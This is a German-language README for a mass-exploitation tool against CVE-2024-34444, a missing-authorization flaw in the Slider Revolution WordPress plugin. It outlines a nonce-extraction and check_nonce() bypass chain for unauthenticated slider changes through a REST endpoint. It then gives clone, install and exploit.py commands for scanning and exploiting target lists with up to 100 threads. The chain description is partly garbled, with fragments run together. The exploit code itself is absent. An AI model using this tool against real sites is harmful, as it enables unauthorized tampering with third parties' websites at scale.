
Massenscanner mit mehreren Threads für CVE-2024-34444 (Fehlende Autorisierung) im Slider Revolution WordPress-Plugin. Automatisiert Nonce-Extraktion, Versionserkennung und Ausnutzung über REST API für nicht authentifizierte Änderung von Slider-Daten.
Professioneller Massen-Scanner für CVE-2024-34444, der das Slider Revolution WordPress-Plugin < 6.7.0 betrifft
Banner
CVE-2024-34444 ist eine Fehlende Autorisierung-Sicherheitslücke im Slider Revolution WordPress-Plugin (Versionen < 6.7.0). Dieser Scanner automatisiert die Erkennung und Ausnutzung anfälliger Installationen über den REST-API-Endpunkt /wp-json/revslider/v1/slider/save.
Sicherheitslücken-Kette:
revslider_actions Nonce aus dem Frontend (öffentlich zugänglich)check_nonce() in der REST-API zu umgehenreadme.txt-v) für detaillierte Protokollierung-o) zum Speichern der Ergebnissegit clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Single target
python3 exploit.py -u https://target.com
# Single target with verbose
python3 exploit.py -u https://target.com -v
# Mass scan from list
python3 exploit.py -l targets.txt -t 20
# Mass scan with output file
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Full example with all options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v